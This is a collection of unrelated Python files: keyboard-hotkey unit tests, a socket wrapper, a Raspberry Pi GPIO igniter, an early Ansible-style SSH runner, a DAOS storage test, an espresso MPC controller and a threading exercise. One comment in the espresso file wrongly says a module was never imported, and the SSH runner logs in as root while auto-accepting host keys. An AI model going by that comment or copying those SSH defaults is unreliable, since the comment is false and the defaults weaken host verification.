self.do(d_ctrl+d_shift+u_shift+d_a, d_shift+u_shift+d_ctrl+d_a)
def test_add_hotkey_single_step_suppress_with_modifiers_fail_unrelated_key(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b, d_shift+d_ctrl+du_b)
def test_add_hotkey_single_step_suppress_with_modifiers_unrelated_key(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b+d_a, d_shift+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_release(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b+d_a+u_ctrl+u_shift, d_shift+d_ctrl+du_b+triggered_event+u_ctrl+u_shift)
def test_add_hotkey_single_step_suppress_with_modifiers_out_of_order(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_shift+d_ctrl+d_a, triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_repeated(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True)
self.do(d_ctrl+du_a+du_b+du_a, triggered_event+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_trigger_on_release(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True, trigger_on_release=True)
self.do(d_ctrl+du_a+du_b+du_a, triggered_event+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifier_superset_release(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True, trigger_on_release=True)
self.do(d_ctrl+d_shift+du_a+u_shift+u_ctrl, d_ctrl+d_shift+du_a+u_shift+u_ctrl)
def test_add_hotkey_single_step_suppress_with_modifier_superset(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_a+u_shift+u_ctrl, d_ctrl+d_shift+du_a+u_shift+u_ctrl)
def test_add_hotkey_single_step_timeout(self):
keyboard.add_hotkey('a', trigger, timeout=1, suppress=True)
self.do(du_a, triggered_event)
def test_add_hotkey_multi_step_first_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.01, suppress=True)
time.sleep(0.03)
self.do(du_a+du_b, triggered_event)
def test_add_hotkey_multi_step_last_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.01, suppress=True)
self.do(du_a, [])
time.sleep(0.05)
self.do(du_b, du_a+du_b)
def test_add_hotkey_multi_step_success_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.05, suppress=True)
self.do(du_a, [])
time.sleep(0.01)
self.do(du_b, triggered_event)
def test_add_hotkey_multi_step_suffix_timeout(self):
keyboard.add_hotkey('a, b, a', trigger, timeout=0.01, suppress=True)
self.do(du_a+du_b, [])
time.sleep(0.05)
self.do(du_a, du_a+du_b)
self.do(du_b+du_a, triggered_event)
def test_add_hotkey_multi_step_allow(self):
keyboard.add_hotkey('a, b', lambda: trigger() or True, suppress=True)
self.do(du_a+du_b, triggered_event+du_a+du_b)
def test_add_hotkey_single_step_nonsuppress(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a+b', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a+d_b)
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_nonsuppress_repeated(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a+b', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a+d_b)
self.do(d_shift+d_ctrl+d_a+d_b)
self.assertTrue(queue.get(timeout=0.5))
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_nosuppress_with_modifiers_out_of_order(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a)
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_suppress_regression_1(self):
keyboard.add_hotkey('a', trigger, suppress=True)
self.do(d_c+d_a+u_c+u_a, d_c+d_a+u_c+u_a)
def test_remap_hotkey_single(self):
keyboard.remap_hotkey('a', 'b')
self.do(d_a+u_a, d_b+u_b)
def test_remap_hotkey_complex_dst(self):
keyboard.remap_hotkey('a', 'ctrl+b, c')
self.do(d_a+u_a, d_ctrl+du_b+u_ctrl+du_c)
def test_remap_hotkey_modifiers(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+d_a+u_a, du_b)
def test_remap_hotkey_modifiers_repeat(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+du_a+du_a, du_b+du_b)
def test_remap_hotkey_modifiers_state(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+du_c+du_a+du_a, d_shift+d_ctrl+du_c+u_shift+u_ctrl+du_b+d_ctrl+d_shift+u_shift+u_ctrl+du_b+d_ctrl+d_shift)
def test_remap_hotkey_release_incomplete(self):
keyboard.remap_hotkey('a', 'b', trigger_on_release=True)
self.do(d_a, [])
def test_remap_hotkey_release_complete(self):
keyboard.remap_hotkey('a', 'b', trigger_on_release=True)
self.do(du_a, du_b)
def test_parse_hotkey_combinations_scan_code(self):
self.assertEqual(keyboard.parse_hotkey_combinations(30), (((30,),),))
def test_parse_hotkey_combinations_single(self):
self.assertEqual(keyboard.parse_hotkey_combinations('a'), (((1,),),))
def test_parse_hotkey_combinations_single_modifier(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+a'), (((1, 5), (1, 6)),))
def test_parse_hotkey_combinations_single_modifiers(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+ctrl+a'), (((1, 5, 7), (1, 6, 7)),))
def test_parse_hotkey_combinations_multi(self):
self.assertEqual(keyboard.parse_hotkey_combinations('a, b'), (((1,),), ((2,),)))
def test_parse_hotkey_combinations_multi_modifier(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+a, b'), (((1, 5), (1, 6)), ((2,),)))
def test_parse_hotkey_combinations_list_list(self):
self.assertEqual(keyboard.parse_hotkey_combinations(keyboard.parse_hotkey_combinations('a, b')), keyboard.parse_hotkey_combinations('a, b'))
def test_parse_hotkey_combinations_fail_empty(self):
with self.assertRaises(ValueError):
keyboard.parse_hotkey_combinations('')
def test_add_hotkey_multistep_suppress_incomplete(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a, [])
self.assertEqual(keyboard._listener.blocking_hotkeys[(1,)], [])
self.assertEqual(len(keyboard._listener.blocking_hotkeys[(2,)]), 1)
def test_add_hotkey_multistep_suppress_complete(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_b, triggered_event)
def test_add_hotkey_multistep_suppress_modifier(self):
keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
self.do(d_shift+du_a+u_shift+du_b, triggered_event)
def test_add_hotkey_multistep_suppress_fail(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_c, du_a+du_c)
def test_add_hotkey_multistep_suppress_three_steps(self):
keyboard.add_hotkey('a, b, c', trigger, suppress=True)
self.do(du_a+du_b+du_c, triggered_event)
def test_add_hotkey_multistep_suppress_repeated_prefix(self):
keyboard.add_hotkey('a, a, c', trigger, suppress=True, trigger_on_release=True)
self.do(du_a+du_a+du_c, triggered_event)
def test_add_hotkey_multistep_suppress_repeated_key(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_a+du_b, du_a+triggered_event)
self.assertEqual(keyboard._listener.blocking_hotkeys[(2,)], [])
self.assertEqual(len(keyboard._listener.blocking_hotkeys[(1,)]), 1)
def test_add_hotkey_multi_step_suppress_regression_1(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(d_c+d_a+u_c+u_a+du_c, d_c+d_a+u_c+u_a+du_c)
def test_add_hotkey_multi_step_suppress_replays(self):
keyboard.add_hotkey('a, b, c', trigger, suppress=True)
self.do(du_a+du_b+du_a+du_b+du_space, du_a+du_b+du_a+du_b+du_space)
def test_add_word_listener_success(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_b+du_c+du_space)
self.assertTrue(queue.get(timeout=0.5))
def test_add_word_listener_no_trigger_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_b+du_c)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_add_word_listener_timeout_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free, timeout=1)
self.do(du_a+du_b+du_c+[make_event(KEY_DOWN, name='space', time=2)])
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_duplicated_word_listener(self):
keyboard.add_word_listener('abc', trigger)
keyboard.add_word_listener('abc', trigger)
def test_add_word_listener_remove(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
keyboard.remove_word_listener('abc')
self.do(du_a+du_b+du_c+du_space)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_add_word_listener_suffix_success(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free, match_suffix=True)
self.do(du_a+du_a+du_b+du_c+du_space)
self.assertTrue(queue.get(timeout=0.5))
def test_add_word_listener_suffix_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_a+du_b+du_c)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
#def test_add_abbreviation(self):
# keyboard.add_abbreviation('abc', 'aaa')
# self.do(du_a+du_b+du_c+du_space, [])
if __name__ == '__main__':
unittest.main()
|
utils.py
|
import json
import base64
import threading
import serializer
from socket import *
from events import EmitterAsync
def _recv(self):
buffer = b""
while self.mode == "client":
packet = b""
try:
packet = socket.recv(self, 1024)
except Exception as e:
if self.mode == "closed":
return None
else:
raise e
buffer += packet
if len(packet) > 0:
# check the accumulated buffer rather than only the last packet, so a
# message whose terminator spans two packets is still detected
if buffer.endswith("\r\n".encode()):
buffer = buffer.rsplit("\r\n".encode(), 1)[0]
try:
data = serializer.loads(buffer.decode())
if "type" in data and data["type"] == "event":
EmitterAsync.emit(self, data["name"], *data["data"])
else:
if data["type"] in ["str", "int", "float", "bool"]:
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] in ["list", "dict", "tuple"]:
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] == "tuple":
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] == "bytes":
EmitterAsync.emit(self, "data", base64.b64decode(data["data"].encode()))
elif data["type"] == "complex":
EmitterAsync.emit(self, "data", complex(data["data"]))
except Exception:
EmitterAsync.emit(self, "data", buffer)
buffer = b""
else:
self.close()
class Socket2(socket, EmitterAsync):
def __init__(self, family=-1, type=-1, proto=-1, fileno=None):
self.mode = "base"
EmitterAsync.__init__(self)
socket.__init__(self, family, type, proto, fileno)
if fileno:
self.mode = "client"
threading.Thread(target=_recv, args=[self]).start()
def accept(self):
fd, addr = super()._accept()
sock = Socket2(self.family, self.type, self.proto, fd)
return sock, addr
def connect(self, address):
socket.connect(self, address)
self.mode = "client"
threading.Thread(target=_recv, args=[self]).start()
def send(self, data):
if type(data) == bytes:
data = {
"type": "bytes",
"data": base64.b64encode(data).decode()
}
elif type(data) in [list, tuple]:
data = {
"type": type(data).__name__,
"data": data
}
elif type(data) == dict:
# only pre-built event envelopes pass through untouched; any other
# dict (with or without a "type" key) gets wrapped, fixing the
# original's fall-through for dicts lacking a "type" key
if data.get("type") != "event":
data = {
"type": "dict",
"data": data
}
elif type(data) == complex:
data = {
"type": "complex",
"data": str(data)
}
elif type(data) in [int, float, str, bool]:
data = {
"type": type(data).__name__,
"data": data
}
else:
raise TypeError("Este tipo de dados não é suportado!")
socket.sendall(self, (serializer.dumps(data) + "\r\n").encode())
def emit(self, event, *data):
return self.sendall({
"type": "event",
"name": event,
"data": list(data)
})
def sendall(self, data):
self.send(data)
def close(self):
if not self.mode == "closed":
self.mode = "closed"
socket.close(self)
EmitterAsync.emit(self, "close")
|
Igniter.py
|
"""
Ethan Armstrong
warmst@uw.edu
Implements the Igniter class
"""
import RPi.GPIO as GPIO
import time
from multiprocessing import Process
class Igniter():
"""
Igniter object, capable of sending a pulse down a specified GPIO pin on a raspberry pi
"""
def __init__(this, pin):
"""
Igniter(pin) | creates a new Igniter object on a given pin\n
pin | the pin, in board mode to send a gate signal
"""
GPIO.setmode(GPIO.BOARD)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin,False)
this._pin = pin
def ignite_sync(this, on_time=1):
"""
ignite_sync(on_time) | ignites the connected charge while blocking for on_time seconds\n
on_time | the time to keep the circuit closed for (seconds), default : 1
"""
this._pulse(this._pin, on_time)
def ignite(this,on_time=1):
"""
ignite(on_time) | ignites the connected charge for on_time seconds in a background task\n
on_time | the time to keep the circuit closed for (seconds), default : 1
"""
p = Process(target=this._pulse, args=[this._pin,on_time])
p.start()
@staticmethod
def _pulse(pin, on_time=1):
"""
_pulse(pin, on_time=1) | a class independent private method to handle a generic pulse event on the set pin\n
pin | the pin to pulse on or off (board mode)\n
on_time | the time to keep the circuit closed (seconds) default : 1
"""
GPIO.output(pin, True)
time.sleep(on_time)
GPIO.output(pin, False)
if "__main__" in __name__:
ig = Igniter(11)
ig.ignite()
|
__init__.py
|
# -*- coding: utf-8 -*-
# core
from optparse import OptionParser
import fnmatch
from multiprocessing import Process, Pipe
from itertools import izip
import os
import json
# non-core
import paramiko
DEFAULT_HOST_LIST = '~/.ansible_hosts' # ansible hosts file
DEFAULT_MODULE_PATH = '~/ansible' # directory where external modules live
DEFAULT_MODULE_NAME = 'ping' # default module
DEFAULT_PATTERN = '*' # host matching pattern
DEFAULT_FORKS = 3 # degree of parallelism
DEFAULT_MODULE_ARGS = '' # default module arguments
class Pooler(object):
"""
Executes a function over a list of arguments in parallel and collects
every return value. ansible uses this feature to run commands concurrently.
To understand the code below, see Process and Pipe in multiprocessing
and izip in itertools.
The link in the comment below is where this code originally came from:
"""
# credit: http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
@classmethod
def spawn(cls, f):
def fun(pipe,x):
pipe.send(f(x))
pipe.close()
return fun
@classmethod
def parmap(cls, f, X):
pipe=[Pipe() for x in X]
proc=[Process(target=cls.spawn(f),args=(c,x)) for x,(p,c) in izip(X,pipe)]
[p.start() for p in proc]
[p.join() for p in proc]
return [p.recv() for (p,c) in pipe]
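# A small illustration (added) of Pooler.parmap: each element of X runs in
# its own process and the results come back in input order, e.g.
# Pooler.parmap(lambda x: x * x, [1, 2, 3]) # -> [1, 4, 9]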
class Cli(object):
def __init__(self):
pass
def runner(self):
parser = OptionParser()
parser.add_option("-H", "--host-list", dest="host_list",
help="path to hosts list", default=DEFAULT_HOST_LIST)
parser.add_option("-L", "--library", dest="module_path",
help="path to module library", default=DEFAULT_MODULE_PATH)
parser.add_option("-F", "--forks", dest="forks",
help="level of parallelism", default=DEFAULT_FORKS)
parser.add_option("-n", "--name", dest="module_name",
help="module name to execute", default=DEFAULT_MODULE_NAME)
parser.add_option("-a", "--args", dest="module_args",
help="module arguments", default=DEFAULT_MODULE_ARGS)
parser.add_option("-p", "--pattern", dest="pattern",
help="hostname pattern", default=DEFAULT_PATTERN)
# the options above define the script's command-line arguments
options, args = parser.parse_args()
host_list = self._host_list(options.host_list)
return Runner(
module_name=options.module_name,
module_path=options.module_path,
module_args=options.module_args,
host_list=host_list,
forks=options.forks,
pattern=options.pattern,
)
def _host_list(self, host_list):
host_list = os.path.expanduser(host_list)
return file(host_list).read().split("\n")
class Runner(object):
def __init__(self, host_list=[], module_path=None,
module_name=None, module_args='',
forks=3, timeout=60, pattern='*'):
self.host_list = host_list
self.module_path = module_path
self.module_name = module_name
self.forks = forks
self.pattern = pattern
self.module_args = module_args
self.timeout = timeout
def _matches(self, host_name):
if host_name == '':
return False
if fnmatch.fnmatch(host_name, self.pattern):
return True
return False
def _connect(self, host):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, username='root',
allow_agent=True, look_for_keys=True)
return ssh
except:
return None
def _executor(self, host):
# TODO: try/catch returning none
conn = self._connect(host)
if not conn:
return [ host, None ]
outpath = self._copy_module(conn)
self._exec_command(conn, "chmod +x %s" % outpath)
cmd = self._command(outpath)
result = self._exec_command(conn, cmd)
result = json.loads(result)
return [ host, result ]
def _command(self, outpath):
cmd = "%s %s" % (outpath, self.module_args)
return cmd
def _exec_command(self, conn, cmd):
stdin, stdout, stderr = conn.exec_command(cmd)
results = stdout.read()
return results
def _copy_module(self, conn):
inpath = os.path.expanduser(os.path.join(self.module_path, self.module_name))
outpath = os.path.join("/var/spool/", "ansible_%s" % self.module_name)
ftp = conn.open_sftp()
ftp.put(inpath, outpath)
ftp.close()
return outpath
def run(self):
hosts = [ h for h in self.host_list if self._matches(h) ]
def executor(x):
return self._executor(x)
results = Pooler.parmap(executor, hosts)
by_host = dict(results)
return by_host
if __name__ == '__main__':
# command line usage example:
result = Cli().runner().run()
print json.dumps(result, sort_keys=True, indent=4)
# API usage example:
#r = Runner(
# host_list = [ '127.0.0.1' ],
# module_path='~/.ansible',
# module_name='ping',
# module_args='',
# pattern='*',
# forks=3
#)
#print r.run()
"""
fnmatch: the Unix filename pattern matching module
import fnmatch
import os
for file in os.listdir('.'):
if fnmatch.fnmatch(file, '*.txt'):
print file
----output
cc.txt
requirements.txt
contributors.txt
"""
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2019 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import os
import traceback
import json
from apricot import TestWithServers
import check_for_pool
from daos_api import DaosContext, DaosPool, DaosContainer, DaosApiError
def check_handle(buf_len, iov_len, buf, uuidstr, rank):
"""
This gets run in a child process and verifies the global
handle can be turned into a local handle in another process.
"""
try:
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as build_file:
build_paths = json.load(build_file)
# setup the DAOS python API in this process
context = DaosContext(build_paths['PREFIX'] + '/lib/')
pool = DaosPool(context)
pool.set_uuid_str(uuidstr)
pool.set_svc(rank)
pool.group = "daos_server"
# note that the handle is stored inside the pool as well
dummy_local_handle = pool.global2local(context, iov_len, buf_len, buf)
# perform some operations that will use the new handle
pool.pool_query()
container = DaosContainer(context)
container.create(pool.handle)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
raise
return
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share pool
handles among processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=pool,poolhandle,vm,small,regression
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode", '/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size", '/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
pool = DaosPool(self.context)
pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
pool.connect(1 << 1)
# create a container just to make sure handle is good
container = DaosContainer(self.context)
container.create(pool.handle)
# create a global handle
iov_len, buf_len, buf = pool.local2global()
# this should work in the future but need on-line server addition
#arg_list = (buf_len, iov_len, buf, pool.get_uuid_str(), 0)
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
check_handle(buf_len, iov_len, buf, pool.get_uuid_str(), 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
espresso-mpc.py
|
#!/usr/bin/python
def he_control_loop(dummy, state):
from time import sleep
from datetime import datetime, timedelta
import RPi.GPIO as GPIO
import config as conf # conf.he_pin and conf.sample_time are used below but conf was never imported in this function
GPIO.setmode(GPIO.BCM)
GPIO.setup(conf.he_pin, GPIO.OUT)
GPIO.output(conf.he_pin,0)
try:
while True:
control_signal = state['control_signal']
# PWM to control heating element
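# e.g. with sample_time = 1 s (illustrative value) and control_signal = 25,
# the element is driven high for 0.25 s and low for 0.75 s of each cycle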
if control_signal >= 100:
GPIO.output(conf.he_pin,1)
sleep(conf.sample_time)
elif control_signal > 0 and control_signal < 100:
GPIO.output(conf.he_pin,1)
sleep(conf.sample_time*control_signal/100.)
GPIO.output(conf.he_pin,0)
sleep(conf.sample_time*(1-(control_signal/100.)))
else:
GPIO.output(conf.he_pin,0)
sleep(conf.sample_time)
finally:
GPIO.output(conf.he_pin,0)
GPIO.cleanup()
def control_loop(dummy,state):
import sys
import pickle
from time import sleep, time, ctime
import math
import RPi.GPIO as GPIO
import config as conf
import numpy
from cvxopt import matrix
from cvxopt import solvers
import mpc_matrices
import timer
import Adafruit_GPIO.SPI as SPI
import Adafruit_MAX31855.MAX31855 as MAX31855
sensor = MAX31855.MAX31855(spi=SPI.SpiDev(conf.spi_port, conf.spi_dev))
lasttime = time()
lastsettemp = state['settemp']
setsteamtemp = state['setsteamtemp']
GPIO.setmode(GPIO.BCM)
GPIO.setup(conf.brew_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(conf.steam_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
brew_state_prev = GPIO.input(conf.brew_pin)
steam_state_prev = GPIO.input(conf.steam_pin)
mpc_mat_brew = mpc_matrices.mpc_matrices(lastsettemp, conf.T_s)
mpc_mat_steam = mpc_matrices.mpc_matrices(setsteamtemp, conf.T_s)
mpc_mat = mpc_mat_brew
A = mpc_mat['A']
B = mpc_mat['B']
B2 = mpc_mat['B2']
u = 0 # Control signal
u_I = 0 # Integral control
n = conf.n
dt = conf.sample_time
tempc = sensor.readTempC()
tempc_prev = tempc
y = tempc - lastsettemp
x = numpy.mat([[y + 3.3], [y]]) # current state
x_prev = numpy.mat([[y + 3.3], [y]]) # previous state
try:
while True:
settemp = state['settemp']
tempc = sensor.readTempC()
if math.isnan(tempc):
tempc = tempc_prev
if abs(tempc - tempc_prev) > 100:
tempc = tempc_prev
tempc_prev = tempc
# If steam button pressed, change setpoint temperature and observer gain
steam_state = GPIO.input(conf.steam_pin)
if steam_state:
state['settemp'] = state['settemp_orig']
K = conf.K_brew
mpc_mat = mpc_mat_brew
else:
state['settemp'] = state['setsteamtemp']
K = conf.K_steam
mpc_mat = mpc_mat_steam
if steam_state != steam_state_prev:
A = mpc_mat['A']
B = mpc_mat['B']
B2 = mpc_mat['B2']
steam_state_prev = steam_state
if state['settemp'] != lastsettemp :
# Change state instantaneously (by-pass filter)
settemp = state['settemp']
x = x - numpy.mat([[settemp], [settemp]]) + numpy.mat([[lastsettemp], [lastsettemp]])
x_prev = x
lastsettemp = state['settemp']
if settemp > 125:
T_s = conf.T_s_high
else:
T_s = conf.T_s
y = tempc - settemp
# Observer
y_tilde = x_prev.item(1,0)
# If brewing, add feed forward control and change observer
brew_state = GPIO.input(conf.brew_pin)
if brew_state: # Not brewing
x = A*x_prev + B*u + B2 + K*conf.sample_time*(y - y_tilde)*numpy.mat('1; 1')
d_1vec = numpy.zeros((n,1))
else: # Brewing
x = A*x_prev + B*(u - conf.brew_boost) + B2 + K*conf.sample_time*(y - y_tilde)*numpy.mat('1; 1')
d_1vec = -numpy.ones((n,1))*conf.brew_boost
x_prev = x
# Check if timer is on
awake = timer.timer(state)
if awake:
# Equality constraint
if brew_state:
b_constr = mpc_mat['A_app']*x + mpc_mat['b_constr']
else:
b_constr = mpc_mat['A_app']*x + mpc_mat['b_constr_brew']
b_opt = matrix(b_constr, tc='d')
# Invoke solver
solvers.options['show_progress'] = False
sol = solvers.lp(mpc_mat['q_opt'], mpc_mat['G_opt'], mpc_mat['h_opt'], mpc_mat['A_opt'], b_opt, solver='cvxopt')
x_opt = numpy.array(sol['x'])
u_mpc = x_opt[2*n,0] # Only use first control signal
# Integral control, only if not steaming
if steam_state:
u_I = u_I - dt*conf.K_I*x.item(1,0)
if u_I > conf.u_I_max:
u_I = conf.u_I_max
elif u_I < -conf.u_I_max:
u_I = -conf.u_I_max
if steam_state:
u = u_mpc + u_I
else:
u = u_mpc
if u < 0:
u = 0
elif u > 100:
u = 100
else:
u = 0
state['awake'] = awake
state['tempc'] = round(x.item(1,0) + settemp,2)
state['control_signal'] = round(u,2)
time1 = time()
time2 = math.ceil(time1)%60
if time2 == 0:
with open('/root/espresso-mpc/objs.pickle', 'wb') as fw:
pickle.dump([state['settemp'], state['settemp_orig'], state['setsteamtemp'], state['TimerOnMo'], state['TimerOffMo'], state['TimerOnTu'], state['TimerOffTu'], state['TimerOnWe'], state['TimerOffWe'], state['TimerOnTh'], state['TimerOffTh'], state['TimerOnFr'], state['TimerOffFr'], state['TimerOnSa'], state['TimerOffSa'], state['TimerOnSu'], state['TimerOffSu']],fw)
exec_time = time1 - lasttime
print 'Exec. time:', str(exec_time), 'Temperature:', state['tempc'], 'Control signal:', state['control_signal'], 'Integral control:', round(u_I, 2), 'Awake:', str(awake), 'Temp. setpoint:', str(settemp), 'y:', str(round(x.item(1,0),2))
sleeptime = lasttime + conf.sample_time - time()
if sleeptime < 0 :
sleeptime = 0
sleep(sleeptime)
lasttime = time()
finally:
GPIO.cleanup()
if __name__ == '__main__':
from multiprocessing import Process, Manager
from time import sleep
from urllib2 import urlopen
import config as conf
import pickle
import rest_server as rest_server
manager = Manager()
state = manager.dict()
state['control_signal'] = 0
state['awake'] = False
# Read states
try:
with open('/root/espresso-mpc/objs.pickle') as fr:
[state['settemp'], state['settemp_orig'], state['setsteamtemp'], state['TimerOnMo'], state['TimerOffMo'], state['TimerOnTu'], state['TimerOffTu'], state['TimerOnWe'], state['TimerOffWe'], state['TimerOnTh'], state['TimerOffTh'], state['TimerOnFr'], state['TimerOffFr'], state['TimerOnSa'], state['TimerOffSa'], state['TimerOnSu'], state['TimerOffSu']] = pickle.load(fr)
except:
state['settemp'] = conf.settemp
state['settemp_orig'] = conf.settemp
state['setsteamtemp'] = conf.setsteamtemp
state['TimerOnMo'] = conf.TimerOnMo
state['TimerOffMo'] = conf.TimerOffMo
state['TimerOnTu'] = conf.TimerOnTu
state['TimerOffTu'] = conf.TimerOffTu
state['TimerOnWe'] = conf.TimerOnWe
state['TimerOffWe'] = conf.TimerOffWe
state['TimerOnTh'] = conf.TimerOnTh
state['TimerOffTh'] = conf.TimerOffTh
state['TimerOnFr'] = conf.TimerOnFr
state['TimerOffFr'] = conf.TimerOffFr
state['TimerOnSa'] = conf.TimerOnSa
state['TimerOffSa'] = conf.TimerOffSa
state['TimerOnSu'] = conf.TimerOnSu
state['TimerOffSu'] = conf.TimerOffSu
p = Process(target=control_loop,args=(1,state))
p.daemon = True
p.start()
h = Process(target=he_control_loop,args=(1,state))
h.daemon = True
h.start()
r = Process(target=rest_server.rest_server,args=(1,state))
r.daemon = True
r.start()
while p.is_alive() and h.is_alive() and r.is_alive():
sleep(0.1)
|
2_dance_mixer.py
|
from __future__ import print_function
from threading import Semaphore, Lock, Thread
from collections import deque
import random
from time import sleep
import time
from timeit import Timer
import itertools
import sys
import logging
#L = int(input('Number of Leaders:'))
#F = int(input('Number of Followers:'))
L = int(sys.argv[1])
F = int(sys.argv[2])
#-----Global Variables-----------
#append right and pop left, FIFO
leaders_line = deque()
followers_line = deque()
dancing = deque([0,0]) #pair of all current dancing couples
leaders_on_floor = deque()
followers_on_floor = deque()
for i in range(0,L):
leaders_line.append(i)
for i in range(0,F):
followers_line.append(i)
floor_counter = 0
can_dance = False
can_enter = False
changing = False
bandwaiting = False
music_lockby_end = False
init = True
rng = random.Random()
rng.seed(100)
#--------------------------------
mutex = Semaphore(1)
Leaders_lock = Semaphore(0)
Follower_lock = Semaphore(0)
# build with comprehensions so each dancer gets its own Semaphore;
# [Semaphore(0)]*N would alias a single semaphore N times
leader_wait = [Semaphore(0) for _ in range(L)]
follower_wait = [Semaphore(0) for _ in range(F)]
#------Bandleaders---------------
def startmusic(music):
global can_enter
global can_dance
global leader_wait
global follower_wait
can_enter = True
can_dance = True
print ("** Band leader started playing ",music," **")
# while there are players still locked, release them
# (unnecessary the first time round, but needed for every later round)
if (init == False):
# not the first round: some players are still blocked on the
# can_enter condition and must be released before the new round starts
for i in range(0,L):
leader_wait[i] = Semaphore(0)
for i in range(0,F):
follower_wait[i] = Semaphore(0)
def end_music(music):
global can_enter
print ("** Band leader stopped playing ",music," **")
def band_leader():
global can_enter
global init
global can_dance
for music in itertools.cycle(['waltz', 'tango', 'foxtrot']):
mutex.acquire()
startmusic(music)
start = time.time()
mutex.release()
while (time.time()-start) <= 5:
if len(followers_on_floor) != 0 and len(leaders_on_floor) != 0:
mutex.acquire()
